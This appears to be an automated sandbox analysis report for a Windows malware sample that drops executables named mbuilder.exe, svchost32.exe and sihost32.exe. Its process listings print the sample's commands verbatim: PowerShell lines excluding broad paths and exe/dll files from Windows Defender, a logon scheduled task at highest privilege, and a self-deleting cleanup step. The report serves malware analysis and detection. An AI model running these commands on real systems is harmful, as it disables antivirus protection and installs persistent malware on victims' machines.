Analysis Overview
SHA256
5f87e339571e6fad52ee59bb9f47bcea7a929187153fe73e2c6bf6f686c346be
Threat Level: Likely malicious
The file 89bf9535900487968f2c9282bc739f78_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-03 05:00
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-03 05:00
Reported
2024-11-03 05:03
Platform
win7-20241010-en
Max time kernel
128s
Max time network
127s
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\mbuilder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\mbuilder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\system32\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\system32\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Windows\mbuilder.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\mbuilder.exe
C:\Windows\mbuilder.exe
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'
C:\Windows\system32\mbuilder.exe
"C:\Windows\system32\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
Files
C:\Windows\mbuilder.exe
| Hash | Value |
| --- | --- |
| MD5 | 0febccd878b78d6a42ea449dd2f8bca9 |
| SHA1 | 7edd6245882138e3b5211ff9ea98d59e3cf5371a |
| SHA256 | a9add30083b1b937144f9933e673062067566df458c605d9b4c817b848325e11 |
| SHA512 | 00949836978dcf133db10e1d04c4513b97eb69d651e781eb91ec1b4b2533cdd1fa7fff39f53bc46bd888b53e55607531c3f50ac1024c182ecc313cf29fcf1523 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4FIMNYIQ5MCYM0VI3FL6.temp
| Hash | Value |
| --- | --- |
| MD5 | f8356ac9a42cb4d9953ab60a51da8067 |
| SHA1 | 7cf5b6912b66d1bdbfb1f1f0e2c3c17b7820b337 |
| SHA256 | 2e85095b15e6f9876c5ef74bb9581df7ff372fb671ff4fa219a2bbc25fdf7ef0 |
| SHA512 | abd88d00b9b5c749bbeed0cd8e6e4900d73dcd42a5a133e6bf12fd856f68de7d53446be57ec82b5249b51d55b2dc3ec4b04cd1d3e08b9bdb77b278be005241a6 |
\??\PIPE\srvsvc
| Hash | Value |
| --- | --- |
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| Hash | Value |
| --- | --- |
| MD5 | f2d36cd608bb92d0096c59ee8ce8345e |
| SHA1 | f0f0a158c540718f74791512b565287968a61f6a |
| SHA256 | db51255e061e2e55ad9b57a88a88a61a1bfa6bfb3a8796f51b48e5c35a5175fb |
| SHA512 | 84de23a4085125d00493cfbb0d94d4e2ce0153049c7bf0176bcc69f7fe4becb834c7d75e1c997a5690a3ca2a99c82c5607168095773ff557d82fbbad65f7ac21 |
\Users\Admin\AppData\Local\Temp\svchost32.exe
| Hash | Value |
| --- | --- |
| MD5 | 0a36dbea88311baeb376ff6fb3ea0a3a |
| SHA1 | 100d0b18060351080e63c3e920017056bc6ad9ee |
| SHA256 | a3d218dbf74614c2beacec478f3d04160e2757022303a105c6a7fe25d044ff6b |
| SHA512 | ad329ddc01dfd4137964aab22de4471f687e44fe2bce98e1efce04f70074d38ba650d59b33fa8430035c54be401f4f751ea94b5ef0ccf60e6b0eb24d816087d8 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| Hash | Value |
| --- | --- |
| MD5 | 2ecd7461cdcd8f331d90b44e9854faf2 |
| SHA1 | d714f3038e051503c9ad6915cc28c2304617dda8 |
| SHA256 | 63ff90cbf00b00721be8bc808c796de2635d90f391ddf5882ee68eecc52eac6f |
| SHA512 | dc3de7568b7a484141254745b5dc63b2d6207f1a1e8c3d7a1a100b462f83f1dd0a9f83d4686797ac8e4ca0f29aa210db697af8cd4e264ffc9e3d16ae15d24ae8 |
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
| Hash | Value |
| --- | --- |
| MD5 | ecd7d7be630be740725bb52e73dafec0 |
| SHA1 | 7def3f5a97ffbd07ad81357262b0c0b49859276d |
| SHA256 | 76b4687442dd515b5e7399abb4a4f603b0634c37ff6b47ed51efae68e0d71706 |
| SHA512 | 412d282c9018c909ea15f6aa2f1651eb4f46ed332b6084f17b58ada74b685a1d357cc71debed5b027973e84760cb6f2d7acd0e759e5850f7c261af472b3bab45 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-03 05:00
Reported
2024-11-03 05:03
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
152s
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\mbuilder.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mbuilder.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\mbuilder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\mbuilder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\system32\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\system32\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Windows\mbuilder.exe
C:\Windows\mbuilder.exe
C:\Windows\mbuilder.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'
C:\Windows\system32\mbuilder.exe
"C:\Windows\system32\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
C:\Windows\mbuilder.exe
| Hash | Value |
| --- | --- |
| MD5 | 0febccd878b78d6a42ea449dd2f8bca9 |
| SHA1 | 7edd6245882138e3b5211ff9ea98d59e3cf5371a |
| SHA256 | a9add30083b1b937144f9933e673062067566df458c605d9b4c817b848325e11 |
| SHA512 | 00949836978dcf133db10e1d04c4513b97eb69d651e781eb91ec1b4b2533cdd1fa7fff39f53bc46bd888b53e55607531c3f50ac1024c182ecc313cf29fcf1523 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_euyzam0r.0k1.ps1
| Hash | Value |
| --- | --- |
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| Hash | Value |
| --- | --- |
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | dbb22d95851b93abf2afe8fb96a8e544 |
| SHA1 | 920ec5fdb323537bcf78f7e29a4fc274e657f7a4 |
| SHA256 | e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465 |
| SHA512 | 16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | ba169f4dcbbf147fe78ef0061a95e83b |
| SHA1 | 92a571a6eef49fff666e0f62a3545bcd1cdcda67 |
| SHA256 | 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1 |
| SHA512 | 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
